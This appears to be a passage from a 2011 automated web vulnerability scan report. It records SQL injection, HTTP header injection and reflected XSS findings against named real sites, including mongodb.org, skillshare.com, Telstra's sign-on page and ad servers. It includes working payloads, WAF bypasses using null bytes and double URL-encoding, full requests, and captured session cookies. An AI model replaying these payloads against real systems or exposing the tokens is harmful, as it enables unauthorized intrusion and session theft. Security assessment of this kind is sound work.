<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00<br>
...[SNIP]...

1.46. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mongodb.org
Path:   /s/1627/3/3/_/styles/colors.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /s/1627/3/3/_/styles/colors.css?spaceKey=&1%2527=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /s/1627/3/3/_/styles/colors.css?spaceKey=&1%2527%2527=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 2

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/css;charset=UTF-8
Date: Wed, 05 Oct 2011 20:49:53 GMT
Expires: Sat, 02 Oct 2021 20:49:53 GMT
X-xgen-cache: yes
X-Cache-Info: caching
Content-Length: 6407

/*
Colors for Confluence (included for all themes by default).
*/


h1, h2, h3, h4, h5, h6,
.wiki-content h1,
.wiki-content h2,
.wiki-content h3,
.wiki-content h4,
.wiki-content h5,
.wiki-content
...[SNIP]...

1.47. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [spaceKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/3/_/styles/colors.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/3/_/styles/colors.css?spaceKey=%00' HTTP/1.1
Host: www.mongodb.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.mongodb.org/dosearchsite.action?queryString=xss&where=DOCS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-903498723-1317847440961; __sid=f958052587ceea881f0f6613baa6bca1affdc622; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.2136194057.1317847505.1317847505.1317847505.1; __utmb=266042259.1.10.1317847505; __utmc=266042259; __utmz=266042259.1317847505.1.1.utmcsr=blog.mongodb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1317847440676-16815; WRUID=0; JSESSIONID=ECAABD73E2AD3E5DC62FD99815D51753

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 20:45:30 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00<br>
...[SNIP]...

1.48. http://www.mongodb.org/s/1627/3/3/_/styles/custom.css [spaceKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/3/_/styles/custom.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/3/_/styles/custom.css?spaceKey=%00' HTTP/1.1
Host: www.mongodb.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.mongodb.org/dosearchsite.action?queryString=xss&where=DOCS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-903498723-1317847440961; __sid=f958052587ceea881f0f6613baa6bca1affdc622; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.2136194057.1317847505.1317847505.1317847505.1; __utmb=266042259.1.10.1317847505; __utmc=266042259; __utmz=266042259.1317847505.1.1.utmcsr=blog.mongodb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1317847440676-16815; WRUID=0; JSESSIONID=ECAABD73E2AD3E5DC62FD99815D51753

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 20:45:30 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00<br>
...[SNIP]...

1.49. http://www.mongodb.org/s/1627/3/4/_/styles/combined.css [spaceKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/4/_/styles/combined.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/4/_/styles/combined.css?spaceKey=community%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2011 20:50:38 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00
   org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:110)
...[SNIP]...

1.50. http://www.mongodb.org/s/1627/3/5/_/styles/combined.css [spaceKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/5/_/styles/combined.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/5/_/styles/combined.css?spaceKey=DOCSJP%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2011 20:50:41 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00
   org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:110)
...[SNIP]...

1.51. http://www.mongodb.org/s/1627/3/6/_/styles/combined.css [spaceKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/6/_/styles/combined.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/6/_/styles/combined.css?spaceKey=DOCSFR%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2011 20:50:26 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00
   org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:110)
...[SNIP]...

1.52. http://www.mongodb.org/s/1627/3/6/_/styles/custom.css [spaceKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/6/_/styles/custom.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/6/_/styles/custom.css?spaceKey=DOCSFR%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 20:50:27 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00<br>
...[SNIP]...

1.53. http://www.skillshare.com/data/0/0/1/12/nyc [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.skillshare.com
Path:   /data/0/0/1/12/nyc

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /data/0/0'/1/12/nyc HTTP/1.1
Host: www.skillshare.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.skillshare.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1785085429-1317847473600; PHPSESSID=hkq01kt0p7olkgqdbu61ggaqn3; __utma=99704988.1177393695.1317847691.1317847691.1317847691.1; __utmb=99704988.1.10.1317847691; __utmc=99704988; __utmz=99704988.1317847691.1.1.utmcsr=blog.skillshare.com|utmccn=(referral)|utmcmd=referral|utmcct=/post/11061623706/ms-bailey

Response

HTTP/1.1 500 CDbException
Server: nginx/0.7.62
Date: Wed, 05 Oct 2011 20:50:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 330

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''))
ORDER BY C.start_ts ASC LIMIT 1372)
' at line 3

2. HTTP header injection  previous  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://dw.com.com/clear/c.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dw.com.com
Path:   /clear/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5f224%0d%0a4ea4acacfd7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/5f224%0d%0a4ea4acacfd7?ptid=2100&onid=201&asid=20115857&astid=1&x_breadcrumb=201&pguid=1317839886720922036497155&testgroup=1&testname=storyblog&testversion=6&ts=1317839896688&sid=162&ld=www.cbsnews.com&ldc=694b22b2-d846-47a8-9bd9-5b049588f45c&xrq=gcx%3Dc%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcbs%2Bnew%2Byork&oid=2100-201_162-20115857&brflv=10.3.183&brwinsz=1032x890&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&xref=http%3A%2F%2Fwww.google.com%2Fsearch&srcurl=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F10%2F05%2Fnational%2Fmain20115857.shtml&title=Unions%20add%20strength%20to%20Wall%20St.%20protests%20-%20CBS%20News HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbsnews.com/stories/2011/10/05/national/main20115857.shtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8IL05erE98AAAAVzE

Response

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:41:30 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.cbsnews.com/clear/5f224
4ea4acacfd7
?ts=1317840090982195&clgf=Cg8IL05erE98AAAAVzE
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif


2.2. http://iv.doubleclick.net/pfadx/nbcu.lim.ny/131129433_undefined_weather_ [dcmt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /pfadx/nbcu.lim.ny/131129433_undefined_weather_

Issue detail

The value of the dcmt request parameter is copied into the Content-Type response header. The payload 8e984%0d%0af1fa4b4f7b6 was submitted in the dcmt parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/nbcu.lim.ny/131129433_undefined_weather_;dcmt=8e984%0d%0af1fa4b4f7b6 HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/pdk442/pdk/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: 8e984
f1fa4b4f7b6
:
Content-Length: 267
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 05 Oct 2011 18:24:01 GMT
Expires: Wed, 05 Oct 2011 18:24:01 GMT
DCLK_imp: v7;x;44306;0-0;0;25398738;0/0;0/0/0;;~aopt=2/0/b2/0;~okv=;dcmt=8e984f1fa4b4f7b6;~cs=f

<a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b97/0/0/%2a/g;44306;0-0;0;25398738;367-300/125;0/0/0;;~okv=;dcmt=8e984f1fa4b4f7b6;~aopt=2/0/b2/0;~sscs=%3f"><img src="http://s0.2mdn.net/vi
...[SNIP]...

2.3. https://signon.telstra.com/login [noFormURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://signon.telstra.com
Path:   /login

Issue detail

The value of the noFormURL request parameter is copied into the Location response header. The payload 509b2%0d%0a0404ce4801a was submitted in the noFormURL parameter. This caused a response containing an injected HTTP header.

Request

GET /login?noFormURL=https%3A%2F%2Fwww.my.telstra.com.au%2Fmyaccount509b2%0d%0a0404ce4801a&goto=http%3A%2F%2Fwww.my.telstra.com.au%3A80%2Fmyaccount%2Foverview HTTP/1.1
Host: signon.telstra.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://telstra.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A984851D17A0-400001414000001C[CE]; VISITORID=1277333297; mbox=check#true#1317840778|session#1317840717795-784590#1317842578; s_cc=true; s_loggedin=not%20logged%20in; s_nr=1317840718091; scPrevious=CrowdSupport; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Web-Server
Date: Wed, 05 Oct 2011 18:52:34 GMT
Cache-control: no-cache
Location: https://www.my.telstra.com.au/myaccount509b2
0404ce4801a

Content-length: 0
Set-Cookie: BIGipServerpl_bpraa_auth_gw_http=132584108.20480.0000; expires=Wed, 05-Oct-2011 19:12:34 GMT; path=/


3. Cross-site scripting (reflected)  previous
There are 424 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.adlegend.com/jscript [@CPSC@ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efd5b'%3balert(1)//b9c84530d46 was submitted in the @CPSC@ parameter. This input was echoed as efd5b';alert(1)//b9c84530d46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2048146_1080838_300x160_1136436_2048146&ML_NIF=N&target=_blank&@CPSC@=efd5b'%3balert(1)//b9c84530d46 HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=OPT_OUT

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:20:51 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
x_transtrans: 42.6.10.688
Set-Cookie: PrefID=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCursor=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCPrf=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLDup=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CSList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CTList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: XGIR=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Content-Type: application/x-javascript
Content-Length: 449
Connection: close

